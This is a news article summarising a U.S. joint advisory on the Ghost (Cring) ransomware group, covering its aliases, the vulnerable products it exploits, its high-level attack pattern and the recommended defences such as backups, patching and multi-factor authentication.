U.S. Authorities Issue Joint Advisory on Ghost/Cring Ransomware Threat
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have issued a joint advisory alerting organizations to the rise of Ghost ransomware attacks. This financially motivated cybercriminal group, also known as Cring, has been responsible for ransomware incidents in over 70 countries, including within its own borders. Authorities warn that Ghost ransomware attacks primarily target entities operating internet-facing services with outdated software and firmware, making them highly susceptible to exploitation.
Ghost first gained attention in early 2021 after it exploited vulnerabilities in Fortinet’s FortiGate VPN devices. Since then, the group has continuously adapted its tactics, changing ransomware payloads and ransom note text frequently. This has resulted in the group being identified by several aliases, including Crypt3r, Hello, Phantom, Strike, Wickrme, HsHarada, and Rapture. Their ability to modify their attack methods makes them a persistent threat to organizations across various sectors, including critical infrastructure, healthcare, education, government, small and medium-sized businesses, and religious institutions.
The ransomware group primarily gains access to systems by exploiting known vulnerabilities in public-facing applications. Their recent attacks have focused on weaknesses in Fortinet FortiOS appliances, Adobe ColdFusion servers, Microsoft SharePoint, and Microsoft Exchange. Once initial access is achieved, Ghost actors typically upload web shells onto compromised servers and use Windows Command Prompt and PowerShell to download and execute Cobalt Strike Beacon malware. This malware allows the attackers to implant ransomware on the system, leading to encryption and subsequent ransom demands.
One of Ghost’s distinguishing characteristics is its speed. Unlike some ransomware operators who maintain long-term access within a compromised network before deploying malware, Ghost often executes its ransomware attacks on the same day that access is gained. This rapid deployment indicates that the group prioritizes quick financial gains over prolonged infiltration.
The ransom notes left by Ghost frequently threaten to leak or sell stolen data if victims do not comply with payment demands. However, investigations by the FBI suggest that large-scale data exfiltration is not a consistent aspect of the group’s operations. While some data has been downloaded to Cobalt Strike Team Servers or transferred to external platforms like Mega.nz, the volume of exfiltrated information is typically limited, often less than hundreds of gigabytes. This suggests that, in many cases, the group relies more on encryption and the threat of exposure rather than actual data theft to pressure victims into paying ransoms.
To mitigate the risks associated with Ghost ransomware attacks, CISA, the FBI, and MS-ISAC urge organizations to adopt several defensive measures. These include maintaining regular offline backups of critical systems to prevent data loss, applying security updates as soon as they become available to patch known vulnerabilities, and enabling phishing-resistant multi-factor authentication to reduce unauthorized access. Organizations are also advised to monitor and, if necessary, restrict the use of PowerShell and other scripting tools to limit the ability of attackers to execute malicious commands.
The advisory provides a detailed list of indicators of compromise, along with specific tactics, techniques, and procedures used by the Ghost group. Cybersecurity experts recommend that organizations review this information closely and take immediate action to strengthen their defenses. Given the evolving nature of ransomware threats, staying vigilant and proactive in cybersecurity practices remains essential.
U.S. authorities continue to monitor the Ghost ransomware group and urge organizations that suspect they have been targeted to report incidents to law enforcement agencies. By sharing threat intelligence and implementing security best practices, organizations can reduce the likelihood of falling victim to ransomware attacks.
